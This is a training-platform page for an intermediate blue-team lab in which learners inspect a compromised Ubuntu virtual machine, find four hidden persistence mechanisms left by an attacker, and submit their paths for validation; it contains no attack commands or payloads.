Start interactive tutorial

← Back to Projects

Reverse Shell Cleanup

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

  • reverse-shell

  • post-exploitation

  • cybersecurity

  • linux

  • blue-team

  • threat-hunting

  • incident response

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

🌱 How to start this lab
Your Mission
  • Validation

In this lab, you’ll face a live incident response scenario. A production Ubuntu server has been compromised, and it is suspected that the attackers have left behind persistent access mechanisms.

Your role as a Blue Team analyst is to inspect the environment, identify all malicious access points, and help restore control of the server.

In this lab, you will practice:

  • Post-exploitation behavior analysis
  • Using Linux commands to trace processes and files

🌱 How to start this lab

👉 This challenge uses a virtual machine designed for post-exploitation scenarios.

  1. If you don't have it yet, download the virtual machine from this link:
We are sorry, you don't have enough privileges to access this block of content, please signup or upgrade your plan to access it.
1https://storage.googleapis.com/cybersecurity-machines/emergency-lab.ova
  1. Import the virtual machine into VirtualBox or VMware.
  2. Start the VM and log in as the default user analyst:4geeks-lab. The terminal will already be active at the beginning of the exercise.

Your Mission

You have logged into a production Ubuntu server after the monitoring team detected suspicious outbound traffic. All signs suggest that the attacker has established persistence mechanisms that remain active.

Your task is to thoroughly inspect the system, identify any malicious artifacts that keep the attacker in control, and neutralize them. Evidence indicates that the access points are carefully hidden.

Validation

Once you believe you’ve identified all four persistence mechanisms, run the following command in the terminal:

1validate_lab

The system will prompt you to enter the absolute paths of the malicious files, one by one. If all paths are correct, you’ll get what you’re looking for.


Now it's your turn to think like a true Blue Team analyst. Recovering the server depends on you!

Good luck, Analyst!

Sign up and get access to solution files and videos for free

We will use it to give you access to your account.
Already have an account? Login here.

By signing up, you agree to the Terms and conditions and Privacy policy.

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

Sign up and get access to solution files and videos for free

We will use it to give you access to your account.
Already have an account? Login here.

By signing up, you agree to the Terms and conditions and Privacy policy.

Difficulty

  • intermediate

Average duration

1 hrs

Technologies

Difficulty

  • intermediate

Average duration

1 hrs

Technologies